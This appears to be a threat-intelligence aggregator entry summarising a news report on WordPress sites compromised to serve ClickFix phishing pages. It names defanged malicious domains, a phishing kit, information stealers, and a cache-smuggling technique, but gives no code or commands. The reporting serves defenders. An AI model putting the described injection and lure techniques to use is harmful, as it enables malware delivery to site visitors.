WordPress Sites Exploited for ClickFix Phishing Attacks

First reported

08.10.2025 19:43

Last updated

1 unique sources, 1 articles

Summary

Hide ▲

WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. The campaign highlights the need for securing WordPress sites and keeping software up-to-date. Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. The emergence of such tools lowers the barrier to entry for cybercriminals, enabling sophisticated, multi-platform attacks. A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.

Timeline

08.10.2025 19:43 1 articles · 10h ago

WordPress Sites Exploited for ClickFix Phishing Attacks
WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.
Show sources

Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
Open in new tab

Information Snippets

Attackers are injecting malicious JavaScript into WordPress sites via the 'functions.php' file in themes.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
The injected code sends an HTTP POST request to 'brazilc[.]com' to retrieve a dynamic payload.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
The payload includes a JavaScript file from 'porsasystem[.]com' and a hidden iframe mimicking Cloudflare assets.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
The domain 'porsasystem[.]com' is part of the Kongtuke traffic distribution system (TDS).
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
The infection chain starts with users visiting a compromised site, leading to ClickFix-style pages for malware distribution.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
The IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
The IUAM ClickFix Generator has been used to deploy information stealers like DeerStealer and Odyssey Stealer.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
A new ClickFix campaign uses cache smuggling to evade detection, storing malicious data in the browser's cache.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
The cache smuggling attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.
First reported: 08.10.2025 19:43

1 source, 1 article
Show sources
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43